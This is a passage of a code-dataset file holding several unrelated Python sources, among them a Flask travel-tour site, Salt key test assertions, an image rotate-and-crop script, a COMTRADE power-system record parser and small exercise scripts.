Борда:')\r\nprint(result2)\r\nprint('Виграє:',max(dic2.items(), key=operator.itemgetter(1))[0])","sub_path":"лаб3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158597406","text":"from random import sample\nfrom flask import Flask, render_template, request\nimport data\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n\n # choose six random tours\n sample_tours = sample(data.tours.items(), 6)\n\n output = render_template(\"index.html\",\n title=data.title,\n departures=data.departures,\n subtitle=data.subtitle,\n description=data.description,\n sample_tours=sample_tours)\n return output\n\n\n@app.route('/from/')\ndef directions(direction):\n\n tours_from_direction = {}\n for tour_id, tour in data.tours.items():\n if tour['departure'] == direction:\n tours_from_direction[tour_id] = tour\n\n output = render_template(\"direction.html\",\n title=data.title,\n departures=data.departures,\n direction=direction,\n tours_from_direction=tours_from_direction)\n return output\n\n\n@app.route('/tours/')\ndef tours(tour_id):\n output = render_template(\"tour.html\",\n title=data.title,\n departures=data.departures,\n tour=data.tours[tour_id])\n return output\n\n\n@app.errorhandler(404)\ndef not_found(e):\n return \"Ничего не нашлось! Вот неудача, отправляйтесь на главную!\"\n\n\n@app.errorhandler(500)\ndef server_error(e):\n return \"Что-то не так, но мы все починим\"\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"131278020","text":"import json\nimport shlex\nimport subprocess\nfrom config import SALT_KEY_CMD\n\n\nSTATES_MAPPING = dict(unaccepted='minions_pre', accepted='minions')\n\n\ndef get_keys_status(env):\n cmd = shlex.split(SALT_KEY_CMD.format(**env))\n cmd.append(\"-L\")\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)\n output, unused_err = process.communicate()\n return json.loads(output)\n\n\ndef assert_minion_key_state(env, expected_state):\n assert expected_state in STATES_MAPPING\n status = get_keys_status(env)\n print('{0} in {1}'.format(env['HOSTNAME'], STATES_MAPPING[expected_state]))\n assert env['HOSTNAME'] in status[STATES_MAPPING[expected_state]]\n\n\ndef assert_proxyminion_key_state(env, expected_state):\n assert expected_state in STATES_MAPPING\n status = get_keys_status(env)\n print('{0} in {1}'.format(env['HOSTNAME'], STATES_MAPPING[expected_state]))\n assert env['PROXY_ID'] in status[STATES_MAPPING[expected_state]]\n","sub_path":"assertions.py","file_name":"assertions.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"435078250","text":"\"\"\"rotate-and-crop analysis.\"\"\"\n\nimport os\nimport logging\nimport argparse\n\nimport numpy as np\nimport scipy.misc\n\nfrom jicbioimage.core.image import Image\nfrom jicbioimage.core.transform import transformation\nfrom jicbioimage.core.io import AutoName, AutoWrite\n\nfrom jicbioimage.transform import (\n remove_small_objects,\n)\n\nfrom jicbioimage.segment import Region\n\nfrom zbar import zbar\n\n__version__ = \"0.0.1\"\n\nAutoName.prefix_format = \"{:03d}_\"\n\n\ndef generate_output_filename(fpath):\n \"\"\"Try to generate filename from QR code in fpath image.\"\"\"\n name = 
os.path.splitext(os.path.basename(fpath))[0]\n stdout, stderr, returncode = zbar(fpath)\n if returncode == 0:\n name = stdout.split(\":\")[1].strip()\n name = name.replace(\" \", \"-\")\n fname = name + \"-rotated-and-cropped.png\"\n return fname\n\n\n@transformation\ndef identity(image):\n \"\"\"Return the image as is.\"\"\"\n return image\n\n\n@transformation\ndef rescale(image, scale):\n \"\"\"Return rescaled image.\"\"\"\n def megapixels(image):\n return image.shape[0] * image.shape[1] / 1e6\n logging.info(\"megapixels pre scaling: {}\".format(megapixels(image)))\n image = scipy.misc.imresize(image, scale)\n logging.info(\"megapixels post scaling: {}\".format(megapixels(image)))\n return image\n\n\n@transformation\ndef rotate(image):\n \"\"\"Return correctly aligned image.\"\"\"\n return np.rot90(image)\n\n\n@transformation\ndef red_channel_diff_to_mask(image, min_diff):\n return image[:, :, 0] < (image[:, :, 2] - min_diff)\n\n\n@transformation\ndef green_channel_diff_to_mask(image, min_diff):\n return image[:, :, 1] < (image[:, :, 2] - min_diff)\n\n\n@transformation\ndef min_blue_mask(image, min_blue):\n return image[:, :, 2] > min_blue\n\n\n@transformation\ndef blue_to_mask(image, min_blue, min_difference):\n blue_mask = min_blue_mask(image, min_blue)\n red_diff_mask = red_channel_diff_to_mask(image, min_difference)\n green_diff_mask = green_channel_diff_to_mask(image, min_difference)\n return np.logical_and(blue_mask,\n np.logical_and(red_diff_mask, green_diff_mask))\n\n\n@transformation\ndef convex_hull(image):\n return Region(image).convex_hull\n\n\ndef analyse_file(fpath, output_directory):\n \"\"\"Analyse a single file.\"\"\"\n logging.info(\"Analysing file: {}\".format(fpath))\n image = Image.from_file(fpath)\n image = rescale(image, 0.5)\n image = rotate(image)\n mask = blue_to_mask(image, 150, 60)\n mask = remove_small_objects(mask, min_size=10)\n if np.sum(mask) < 10:\n print(\"skipping {}\".format(fpath))\n return\n mask = convex_hull(mask)\n ys, xs = Region(mask).index_arrays\n\n fname = generate_output_filename(fpath)\n fpath = os.path.join(AutoName.directory, fname)\n with open(fpath, \"wb\") as fh:\n fh.write(image[min(ys):max(ys), min(xs):max(xs), :].png())\n\n\ndef analyse_directory(input_directory, output_directory):\n \"\"\"Analyse all the files in a directory.\"\"\"\n logging.info(\"Analysing files in directory: {}\".format(input_directory))\n for fname in os.listdir(input_directory):\n fpath = os.path.join(input_directory, fname)\n analyse_file(fpath, output_directory)\n\n\ndef main():\n # Parse the command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"input_source\", help=\"Input file/directory\")\n parser.add_argument(\"output_dir\", help=\"Output directory\")\n parser.add_argument(\"--debug\", default=False, action=\"store_true\",\n help=\"Write out intermediate images\")\n args = parser.parse_args()\n\n # Create the output directory if it does not exist.\n if not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n AutoName.directory = args.output_dir\n\n # Only write out intermediate images in debug mode.\n if not args.debug:\n AutoWrite.on = False\n\n # Setup a logger for the script.\n log_fname = \"audit.log\"\n log_fpath = os.path.join(args.output_dir, log_fname)\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(filename=log_fpath, level=logging_level)\n\n # Log some basic information about the script that is running.\n logging.info(\"Script name: 
{}\".format(__file__))\n logging.info(\"Script version: {}\".format(__version__))\n\n # Run the analysis.\n if os.path.isfile(args.input_source):\n analyse_file(args.input_source, args.output_dir)\n elif os.path.isdir(args.input_source):\n analyse_directory(args.input_source, args.output_dir)\n else:\n parser.error(\"{} not a file or directory\".format(args.input_source))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243970929","text":"# -*- coding: utf-8 -*-\n\nimport datetime as dt\nimport errno\nimport math\nimport os\nimport re\nimport struct\nimport sys\nimport warnings\n\n# COMTRADE standard revisions\nREV_1991 = \"1991\"\nREV_1999 = \"1999\"\nREV_2013 = \"2013\"\n\n# DAT file format types\nTYPE_ASCII = \"ASCII\"\nTYPE_BINARY = \"BINARY\"\nTYPE_BINARY32 = \"BINARY32\"\nTYPE_FLOAT32 = \"FLOAT32\"\n\n# Special values\nTIMESTAMP_MISSING = 0xFFFFFFFF\n\n# CFF headers\nCFF_HEADER_REXP = \"(?i)--- file type: ([a-z]+)(?:\\\\s([a-z]+))? ---$\"\n\n# common separator character of data fields of CFG and ASCII DAT files\nSEPARATOR = \",\"\n\n# timestamp regular expression\nre_dt = re.compile(\"([0-9]{1,2})/([0-9]{1,2})/([0-9]{4}),([0-9]{2}):([0-9]{2}):([0-9]{2})\\\\.([0-9]{5,12})\")\n\n# Non-standard revision warning\nWARNING_UNKNOWN_REVISION = \"Unknown standard revision \\\"{}\\\"\"\n# Date time with nanoseconds resolution warning\nWARNING_DATETIME_NANO = \"Unsupported datetime objects with nanoseconds \\\nresolution. Using truncated values.\"\n\n\ndef _read_sep_values(line):\n return line.strip().split(SEPARATOR)\n\n\ndef _prevent_null(str_value, type, default_value):\n if len(str_value.strip()) == 0:\n return default_value\n else:\n return type(str_value)\n\n\ndef _read_timestamp(tstamp):\n m = re_dt.match(tstamp)\n day = int(m.group(1))\n month = int(m.group(2))\n year = int(m.group(3))\n hour = int(m.group(4))\n minute = int(m.group(5))\n second = int(m.group(6))\n frac_second = int(m.group(7))\n in_nanoseconds = len(m.group(7)) > 6\n\n # timezone information\n tzinfo = None\n microsecond = frac_second\n if in_nanoseconds:\n # Nanoseconds resolution is not supported by datetime module, so it's\n # converted to integer below.\n warnings.warn(Warning(WARNING_DATETIME_NANO))\n microsecond = int(microsecond * 1E-3)\n\n return dt.datetime(year, month, day, hour, minute, second, \n microsecond, tzinfo)\n\n\nclass Cfg:\n # time base units\n TIME_BASE_NANOSEC = 1E-9\n TIME_BASE_MICROSEC = 1E-6\n\n def __init__(self):\n self.filename = \"\"\n # implicit data\n self._time_base = self.TIME_BASE_MICROSEC\n\n # Default CFG data\n self._station_name = \"\"\n self._rec_dev_id = \"\"\n self._rev_year = 2013\n self._channels_count = 0\n self._analog_channels = []\n self._digital_channels = []\n self._analog_count = 0\n self._digital_count = 0\n self._frequency = 60.0\n self._nrates = 1\n self._sample_rates = []\n self._timestamp_critical = False\n self._start_timestamp = \"\"\n self._trigger_timestamp = \"\"\n self._ft = TYPE_ASCII\n self._timemult = 1.0\n # 2013 standard revision information\n # time_code,local_code = 0,0 means local time is UTC\n self._time_code = 0\n self._local_code = 0\n # tmq_code,leapsec\n self._tmq_code = 0\n self._leapsec = 0\n\n @property\n def station_name(self):\n return self._station_name\n \n @property\n def rec_dev_id(self):\n return self._rec_dev_id\n\n @property\n def 
rev_year(self):\n return self._rev_year\n\n @property\n def channels_count(self):\n return self._channels_count\n\n @property\n def analog_channels(self):\n return self._analog_channels\n \n @property\n def digital_channels(self):\n return self._digital_channels\n \n @property\n def analog_count(self):\n return self._analog_count\n \n @property\n def digital_count(self):\n return self._digital_count\n \n @property\n def time_base(self):\n return self._time_base\n\n @property\n def frequency(self):\n return self._frequency\n \n @property\n def ft(self):\n return self._ft\n \n @property\n def timemult(self):\n return self._timemult\n \n @property\n def start_timestamp(self):\n return self._start_timestamp\n \n @property\n def trigger_timestamp(self):\n return self._trigger_timestamp\n \n @property\n def nrates(self):\n return self._nrates\n \n @property\n def sample_rates(self):\n return self._sample_rates\n\n def load(self, filepath):\n self.filepath = filepath\n\n if os.path.isfile(self.filepath):\n with open(self.filepath, \"r\") as cfg:\n self._read_file(cfg)\n else:\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), \n self.filepath)\n\n def read(self, cfg_lines):\n if type(cfg_lines) is str:\n self._read_file(cfg_lines.splitlines())\n else:\n self._read_file(cfg_lines)\n\n def _read_file(self, cfg):\n line_count = 0\n self._nrates = 1\n self._sample_rates = []\n self._analog_channels = []\n self._digital_channels = []\n for line in cfg:\n if 0 == line_count:\n # station, device, and comtrade standard revision information\n packed = _read_sep_values(line)\n if 3 == len(packed):\n # only 1999 revision and above has the standard revision year\n self._station_name, self._rec_dev_id, self._rev_year = packed\n self._rev_year = self._rev_year.strip()\n\n if self._rev_year not in (REV_1991, REV_1999, REV_2013):\n msg = WARNING_UNKNOWN_REVISION.format(self._rev_year)\n warnings.warn(Warning(msg))\n else:\n self._station_name, self._rec_dev_id = packed\n self._rev_year = REV_1999\n\n if 1 == line_count:\n # number of channels and its type\n totchn, achn, dchn = _read_sep_values(line)\n self._channels_count = int(totchn)\n self._analog_count = int(achn[:-1])\n self._digital_count = int(dchn[:-1])\n self._analog_channels = [None]*self._analog_count\n self._digital_channels = [None]*self._digital_count\n if 1 < line_count and line_count <= 1 + self._channels_count:\n # channel information\n # channel index\n ichn = line_count - 2\n packed = _read_sep_values(line)\n # analog or digital channel?\n if ichn < self._analog_count:\n # analog channel index\n iachn = ichn\n # unpack values\n n, name, ph, ccbm, uu, a, b, skew, cmin, cmax, primary, secondary, pors = packed\n # type conversion\n n = int(n)\n a = float(a)\n b = _prevent_null(b, float, 0.0)\n skew = _prevent_null(skew, float, 0.0)\n cmin = float(cmin)\n cmax = float(cmax)\n primary = float(primary)\n secondary = float(secondary)\n self.analog_channels[iachn] = AnalogChannel(n, a, b, skew, \n cmin, cmax, name, uu, ph, ccbm, primary, secondary, pors)\n else:\n # digital channel index\n idchn = ichn - self._analog_count\n # unpack values\n n, name, ph, ccbm, y = packed\n # type conversion\n n = int(n)\n y = int(y)\n self.digital_channels[idchn] = DigitalChannel(n, name, ph, ccbm, y)\n\n if line_count == 2 + self._channels_count:\n self._frequency = float(line.strip())\n if line_count == 3 + self._channels_count:\n # number of different sample rates\n self._nrates = int(line.strip())\n if self._nrates == 0:\n self._nrates = 1\n 
self._timestamp_critical = True\n                else:\n                    self._timestamp_critical = False\n            if line_count > 3 + self._channels_count and line_count <= 3 + self._channels_count + self._nrates:\n                # each sample rate\n                samp, endsamp = _read_sep_values(line)\n                samp = float(samp)\n                endsamp = int(endsamp)\n                self.sample_rates.append([samp, endsamp])\n\n            if line_count == 4 + self._channels_count + self._nrates:\n                # first data point and time base\n                ts_str = line.strip()\n                self._start_timestamp = _read_timestamp(ts_str)\n                self._time_base = self._get_time_base(ts_str)\n\n            if line_count == 5 + self._channels_count + self._nrates:\n                # event data point and time base\n                ts_str = line.strip()\n                self._trigger_timestamp = _read_timestamp(ts_str)\n\n                self._time_base = min([self.time_base, \n                    self._get_time_base(ts_str)])\n\n            if line_count == 6 + self._channels_count + self._nrates:\n                # file type\n                self._ft = line.strip()\n\n            if self._rev_year in (REV_1999, REV_2013):\n                if line_count == 7 + self._channels_count + self._nrates:\n                    # timestamp multiplication factor\n                    self._timemult = float(line.strip())\n\n            if self._rev_year == REV_2013:\n                if line_count == (8 + self._channels_count + self._nrates):\n                    # time_code and local_code\n                    self._time_code, self._local_code = _read_sep_values(line)\n                if line_count == (9 + self._channels_count + self._nrates):\n                    # tmq_code and leapsec\n                    self._tmq_code, self._leapsec = _read_sep_values(line)\n\n            line_count = line_count + 1\n\n    def _get_time_base(self, timestamp):\n        # Return the time base based on the fractional part of the seconds\n        # in a timestamp (00.XXXXX).\n        match = re_dt.match(timestamp)\n        in_nanoseconds = len(match.group(7)) > 6\n        if in_nanoseconds:\n            return self.TIME_BASE_NANOSEC\n        else:\n            return self.TIME_BASE_MICROSEC\n\n\n\nclass Comtrade:\n    # extensions\n    EXT_CFG = \"cfg\"\n    EXT_DAT = \"dat\"\n    # format specific\n    ASCII_SEPARATOR = \",\"\n    \n    def __init__(self):\n        self.filename = \"\"\n\n        self._cfg = Cfg()\n\n        # Default CFG data\n        self._analog_channel_ids = []\n        self._digital_channel_ids = []\n        self._timestamp_critical = False\n\n        # DAT file data\n        self._time_values = []\n        self._analog_values = []\n        self._digital_values = []\n\n    @property\n    def station_name(self):\n        return self._cfg._station_name\n    \n    @property\n    def rec_dev_id(self):\n        return self._cfg._rec_dev_id\n\n    @property\n    def rev_year(self):\n        return self._cfg._rev_year\n\n    @property\n    def cfg(self):\n        return self._cfg\n\n    @property\n    def analog_channel_ids(self):\n        return self._analog_channel_ids\n    \n    @property\n    def digital_channel_ids(self):\n        return self._digital_channel_ids\n\n    @property\n    def time(self):\n        return self._time_values\n\n    @property\n    def analog(self):\n        return self._analog_values\n    \n    @property\n    def digital(self):\n        return self._digital_values\n\n    @property\n    def total_samples(self):\n        return self._total_samples\n\n    @property\n    def frequency(self):\n        return self._cfg.frequency\n\n    @property\n    def start_timestamp(self):\n        return self._cfg.start_timestamp\n\n    @property\n    def trigger_timestamp(self):\n        return self._cfg.trigger_timestamp\n\n    @property\n    def channels_count(self):\n        return self._cfg.channels_count\n\n    @property\n    def analog_count(self):\n        return self._cfg.analog_count\n    \n    @property\n    def digital_count(self):\n        return self._cfg.digital_count\n\n    @property\n    def trigger_time(self):\n        \"\"\"Relative trigger time in seconds.\"\"\"\n        stt = self._cfg.start_timestamp\n        trg = self._cfg.trigger_timestamp\n        tdiff = trg - stt\n        tsec = (tdiff.days*60*60*24) + tdiff.seconds + 
(tdiff.microseconds*1E-6)\n return tsec\n\n @property\n def time_base(self):\n return self._cfg.time_base\n\n @property\n def ft(self):\n return self._cfg.ft\n \n def __str__(self):\n pass\n\n def __repr__(self):\n pass\n\n def _get_dat_reader(self):\n # case insensitive comparison of file format\n dat = None\n ft_upper = self.ft.upper()\n if ft_upper == TYPE_ASCII:\n dat = AsciiDatReader()\n elif ft_upper == TYPE_BINARY:\n dat = BinaryDatReader()\n elif ft_upper == TYPE_BINARY32:\n dat = Binary32DatReader()\n elif ft_upper == TYPE_FLOAT32:\n dat = Float32DatReader()\n else:\n dat = None\n raise Exception(\"Not supported data file format: {}\".format(self.ft))\n return dat\n\n def read(self, cfg_lines, dat_lines):\n self._cfg.read(cfg_lines)\n\n # channel ids\n self._cfg_extract_channels_ids(self._cfg)\n\n dat = self._get_dat_reader()\n dat.read(dat_lines, self._cfg)\n\n # copy dat object information\n self._dat_extract_data(dat)\n\n def _cfg_extract_channels_ids(self, cfg):\n self._analog_channel_ids = [channel.name for channel in cfg.analog_channels]\n self._digital_channel_ids = [channel.name for channel in cfg.digital_channels]\n\n def _dat_extract_data(self, dat):\n self._time_values = dat.time\n self._analog_values = dat.analog\n self._digital_values = dat.digital\n self._total_samples = dat.total_samples\n\n def load(self, cfg_file, dat_file = None):\n # which extension: CFG or CFF?\n file_ext = cfg_file[-3:].upper()\n if file_ext == \"CFG\":\n # if not informed, infer dat_file with cfg_file\n if dat_file is None:\n dat_file = cfg_file[:-3] + \"DAT\"\n\n # load both\n self._load_cfg_dat(cfg_file, dat_file)\n elif file_ext == \"CFF\":\n # check if the CFF file exists\n # load file\n self._load_cff(cfg_file)\n else:\n # TODO: raise exception: expected CFG file\n pass\n\n def _load_cfg_dat(self, cfg_filepath, dat_filepath):\n self._cfg.load(cfg_filepath)\n\n # channel ids\n self._cfg_extract_channels_ids(self._cfg)\n\n dat = self._get_dat_reader()\n dat.load(dat_filepath, self._cfg)\n\n # copy dat object information\n self._dat_extract_data(dat)\n\n def _load_cff(self, cff_filepath):\n # stores each file type lines\n cfg_lines = []\n dat_lines = []\n hdr_lines = []\n inf_lines = []\n with open(cff_filepath, \"r\") as file:\n line_number = 0\n # file type: CFG, HDR, INF, DAT\n ftype = None\n # file format: ASCII, BINARY, BINARY32, FLOAT32\n fformat = None\n header_re = re.compile(CFF_HEADER_REXP)\n last_match = None\n for line in file:\n mobj = header_re.match(line.strip().upper())\n if mobj is not None:\n last_match = mobj\n ftype = last_match.groups()[0]\n fformat = last_match.groups()[1]\n continue\n if last_match is not None and ftype == \"CFG\":\n cfg_lines.append(line.strip())\n\n if last_match is not None and ftype == \"DAT\":\n dat_lines.append(line.strip())\n\n if last_match is not None and ftype == \"HDR\":\n hdr_lines.append(line.strip())\n\n if last_match is not None and ftype == \"INF\":\n inf_lines.append(line.strip())\n \n # process CFF data\n self.read(cfg_lines, dat_lines)\n\n\n def cfg_summary(self):\n st = \"Channels (total,A,D): {}A + {}D = {}\\n\".format(self.analog_count, self.digital_count, self.channels_count)\n st = st + \"Line frequency: {} Hz\\n\".format(self.frequency)\n for i in range(self._cfg.nrates):\n rate, points = self._cfg.sample_rates[i]\n st = st + \"Sample rate of {} Hz to the sample #{}\\n\".format(rate, points)\n st = st + \"From {} to {} with time mult. 
= {}\\n\".format(self.start_timestamp, self.trigger_timestamp, self._cfg.timemult)\n        st = st + \"{} format\\n\".format(self.ft)\n        return st\n\n\nclass Channel:\n    def __init__(self, n=1, name='', ph='', ccbm=''):\n        self.n = n\n        self.name = name\n        self.ph = ph\n        self.ccbm = ccbm\n\n    def __str__(self):\n        return ','.join([str(self.n), self.name, self.ph, self.ccbm])\n\n\nclass DigitalChannel(Channel):\n    def __init__(self, n, name='', ph='', ccbm='', y=''):\n        self.n = n\n        self.name = name\n        self.ph = ph\n        self.ccbm = ccbm\n        self.y = y\n\n    def __str__(self):\n        fields = [str(self.n), self.name, self.ph, self.ccbm, str(self.y)]\n        return ','.join(fields)\n\n\nclass AnalogChannel(Channel):\n    def __init__(self, n, a, b=0.0, skew=0.0, cmin=-32767, cmax=32767, \n        name='', uu='', ph='', ccbm='', primary=1, secondary=1, pors='P'):\n        self.name = name\n        self.uu = uu\n        self.n = n\n        self.a = a\n        self.b = b\n        self.skew = skew\n        self.cmin = cmin\n        self.cmax = cmax\n        # misc\n        self.ph = ph\n        self.ccbm = ccbm\n        self.primary = primary\n        self.secondary = secondary\n        self.pors = pors\n\n    def __str__(self):\n        fields = [str(self.n), self.name, self.ph, self.ccbm, self.uu, \n            str(self.a), str(self.b), str(self.skew), str(self.cmin), \n            str(self.cmax), str(self.primary), str(self.secondary), self.pors]\n        return ','.join(fields)\n\n\nclass DatReader:\n    read_mode = \"r\"\n\n    def __init__(self):\n        self.filepath = \"\"\n        self._content = None\n        self._cfg = None\n        self.time = []\n        self.analog = []\n        self.digital = []\n        self._total_samples = 0\n\n    @property\n    def total_samples(self):\n        return self._total_samples\n\n    def load(self, dat_filepath, cfg):\n        self.filepath = dat_filepath\n        self._content = None\n        if os.path.isfile(self.filepath):\n            # extract CFG file information regarding data dimensions\n            self._cfg = cfg\n            self._preallocate()\n            with open(self.filepath, self.read_mode) as contents:\n                self.parse(contents)\n        else:\n            raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), \n                self.filepath)\n\n    def read(self, dat_lines, cfg):\n        self.filepath = None\n        self._content = dat_lines\n        self._cfg = cfg\n        self._preallocate()\n        self.parse(dat_lines)\n\n    def _preallocate(self):\n        # read from the cfg file the number of samples in the dat file\n        steps = self._cfg.sample_rates[-1][1] # last samp field\n        self._total_samples = steps\n\n        # analog and digital count\n        analog_count = self._cfg.analog_count\n        digital_count = self._cfg.digital_count\n\n        # preallocate analog and digital values\n        self.time = [0.0] * steps\n        self.analog = [None] * analog_count\n        self.digital = [None] * digital_count\n        # preallocate each channel values with zeros\n        for i in range(analog_count):\n            self.analog[i] = [0.0] * steps\n        for i in range(digital_count):\n            self.digital[i] = [0] * steps\n\n    def parse(self, contents):\n        pass\n\n\nclass AsciiDatReader(DatReader):\n    ASCII_SEPARATOR = SEPARATOR\n\n    DATA_MISSING = \"\"\n\n    def parse(self, contents):\n        analog_count = self._cfg.analog_count\n        digital_count = self._cfg.digital_count\n        timemult = self._cfg.timemult\n        time_base = self._cfg.time_base\n\n        # auxiliary vectors (channels gains and offsets)\n        a = [x.a for x in self._cfg.analog_channels]\n        b = [x.b for x in self._cfg.analog_channels]\n\n        # extract lines\n        if type(contents) is str:\n            lines = contents.splitlines()\n        else:\n            lines = contents\n\n        line_number = 0\n        for line in lines:\n            line_number = line_number + 1\n            if line_number <= self._total_samples:\n                values = line.strip().split(self.ASCII_SEPARATOR)\n\n                n = values[0]\n                t = float(values[1]) * 
time_base * timemult\n                avalues = [float(x)*a[i] + b[i] for i, x in enumerate(values[2:analog_count+2])]\n                dvalues = [int(x) for x in values[analog_count+2:]]\n\n                # store\n                self.time[line_number-1] = t\n                for i in range(analog_count):\n                    self.analog[i][line_number - 1] = avalues[i]\n                for i in range(digital_count):\n                    self.digital[i][line_number - 1] = dvalues[i]\n\n\nclass BinaryDatReader(DatReader):\n    ANALOG_BYTES = 2\n    DIGITAL_BYTES = 2\n    TIME_BYTES = 4\n    SAMPLE_NUMBER_BYTES = 4\n\n    # maximum negative value\n    DATA_MISSING = 0xFFFF\n\n    read_mode = \"rb\"\n\n    STRUCT_FORMAT = \"LL {acount:d}h {dcount:d}H\"\n    STRUCT_FORMAT_ANALOG_ONLY = \"LL {acount:d}h\"\n    STRUCT_FORMAT_DIGITAL_ONLY = \"LL {dcount:d}H\"\n\n    def get_reader_format(self, analog_channels, digital_bytes):\n        # Number of digital fields of 2 bytes based on the total number of \n        # bytes.\n        dcount = math.floor(digital_bytes / 2)\n        \n        # Check the file configuration\n        if int(digital_bytes) > 0 and int(analog_channels) > 0:\n            return self.STRUCT_FORMAT.format(acount=analog_channels, \n                dcount=dcount)\n        elif int(analog_channels) > 0:\n            # Analog channels only.\n            return self.STRUCT_FORMAT_ANALOG_ONLY.format(acount=analog_channels)\n        else:\n            # Digital channels only.\n            return self.STRUCT_FORMAT_DIGITAL_ONLY.format(dcount=dcount)\n\n    def parse(self, contents):\n        timemult = self._cfg.timemult\n        time_base = self._cfg.time_base\n        frequency = self._cfg.frequency\n        achannels = self._cfg.analog_count\n        dchannels = self._cfg.digital_count\n\n        # auxiliary vectors (channels gains and offsets)\n        a = [x.a for x in self._cfg.analog_channels]\n        b = [x.b for x in self._cfg.analog_channels]\n\n        sample_id_bytes = self.SAMPLE_NUMBER_BYTES + self.TIME_BYTES\n        abytes = achannels*self.ANALOG_BYTES\n        dbytes = self.DIGITAL_BYTES * math.ceil(dchannels / 16.0)\n        bytes_per_row = sample_id_bytes + abytes + dbytes\n        groups_of_16bits = math.floor(dbytes / self.DIGITAL_BYTES)\n        period = 1 / frequency\n\n        # Struct format.\n        rowreader = struct.Struct(self.get_reader_format(achannels, dbytes))\n\n        # Row reading function.\n        nextrow = None\n        if hasattr(contents, 'read'):\n            # It's an IO buffer.\n            nextrow = lambda offset: contents.read(bytes_per_row)\n        else:\n            # It's an array.\n            nextrow = lambda offset: contents[offset:offset + bytes_per_row]\n\n        # Get next row.\n        buffer_offset = 0\n        row = nextrow(buffer_offset)\n\n        irow = 0\n        while row != b'':\n            values = rowreader.unpack(row)\n            # Sample number\n            n = values[0]\n            # Calculated time\n            # TODO: add support for multiple sampling rates\n            t = (n - 1) * period\n\n            # Read time\n            ts_val = values[1]\n            if ts_val != TIMESTAMP_MISSING:\n                ts = values[1] * time_base * timemult\n            else:\n                # if the timestamp is missing, use calculated.\n                ts = t\n\n            # Using calculated timestamp, ignoring file timestamp.\n            # TODO: add option to enforce dat file timestamp, when available\n            self.time[irow] = t\n\n            # Extract analog channel values.\n            for ichannel in range(achannels):\n                yint = values[ichannel + 2]\n                y = a[ichannel] * yint + b[ichannel]\n                self.analog[ichannel][irow] = y\n\n            # Extract digital channel values.\n            for igroup in range(groups_of_16bits):\n                group = values[achannels + 2 + igroup]\n\n                # for each group of 16 bits, extract the digital channels\n                maxchn = min([ (igroup+1) * 16, dchannels])\n                for ichannel in range(igroup * 16, maxchn):\n                    chnindex = ichannel - igroup*16\n                    mask = int('0b01', 2) << chnindex\n                    extract = (group & mask) >> chnindex\n\n                    self.digital[ichannel][irow] = extract\n\n            # Get the next row\n            irow += 1\n            buffer_offset += bytes_per_row\n            
row = nextrow(buffer_offset)\n\n\nclass Binary32DatReader(BinaryDatReader):\n ANALOG_BYTES = 4\n\n STRUCT_FORMAT = \"LL {acount:d}l {dcount:d}H\"\n STRUCT_FORMAT_ANALOG_ONLY = \"LL {acount:d}l\"\n\n # maximum negative value\n DATA_MISSING = 0xFFFFFFFF\n\n\nclass Float32DatReader(BinaryDatReader):\n ANALOG_BYTES = 4\n\n STRUCT_FORMAT = \"LL {acount:d}f {dcount:d}H\"\n STRUCT_FORMAT_ANALOG_ONLY = \"LL {acount:d}f\"\n\n # Maximum negative value\n DATA_MISSING = sys.float_info.min\n","sub_path":"comtrade.py","file_name":"comtrade.py","file_ext":"py","file_size_in_byte":25541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"56849119","text":"# Hint: You may not need all of these. Remove the unused functions.\nclass Ticket:\n def __init__(self, source, destination):\n self.source = source\n self.destination = destination\n\n\ndef reconstruct_trip(tickets, length):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n\n # Build up a table of sources to destinations\n table = {}\n for ticket in tickets:\n if ticket.source == \"NONE\":\n table[\"START\"] = ticket.destination\n elif ticket.destination == \"NONE\":\n table[ticket.source] = \"END\"\n else:\n table[ticket.source] = ticket.destination\n\n # Create a list with a length equaling all destinations\n route = [None] * (length)\n\n # Create pointers for our while loop\n current = \"START\"\n destination = table[current]\n index = 0\n\n while destination in table:\n route[index] = destination\n index += 1\n current = destination\n destination = table[current]\n route[index] = \"NONE\"\n return route\n","sub_path":"hashtables/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"328704064","text":"# open the file - and read all of the lines.\r\nchanges_file = 'changes_python.txt'\r\n# use strip to strip out spaces and trim the line.\r\n\r\ndata = [line.strip() for line in open(changes_file, 'r')]\r\n\r\nsep = 72*'-'\r\n\r\n# create the commit class to hold each of the elements - there should be 422\r\nclass Commit:\r\n 'class for commits'\r\n \r\n def __init__(self, revision = None, author = None, date = None, comment_line_count = None, changes = None, comment = None):\r\n self.revision = revision\r\n self.author = author\r\n self.date = date\r\n self.comment_line_count = comment_line_count\r\n self.changes = changes\r\n self.comment = comment\r\n\r\n def get_commit_comment(self):\r\n return 'svn merge -r' + str(self.revision-1) + ':' + str(self.revision) + ' by ' \\\r\n + self.author + ' with the comment ' + ','.join(self.comment) \\\r\n + ' and the changes ' + ','.join(self.changes)\r\n\r\ncommits = []\r\ncurrent_commit = None\r\nindex = 0\r\n\r\nauthor = {}\r\nwhile True:\r\n try:\r\n # parse each of the commits and put them into a list of commits\r\n current_commit = Commit()\r\n details = data[index + 1].split('|')\r\n current_commit.revision = int(details[0].strip().strip('r'))\r\n current_commit.author = 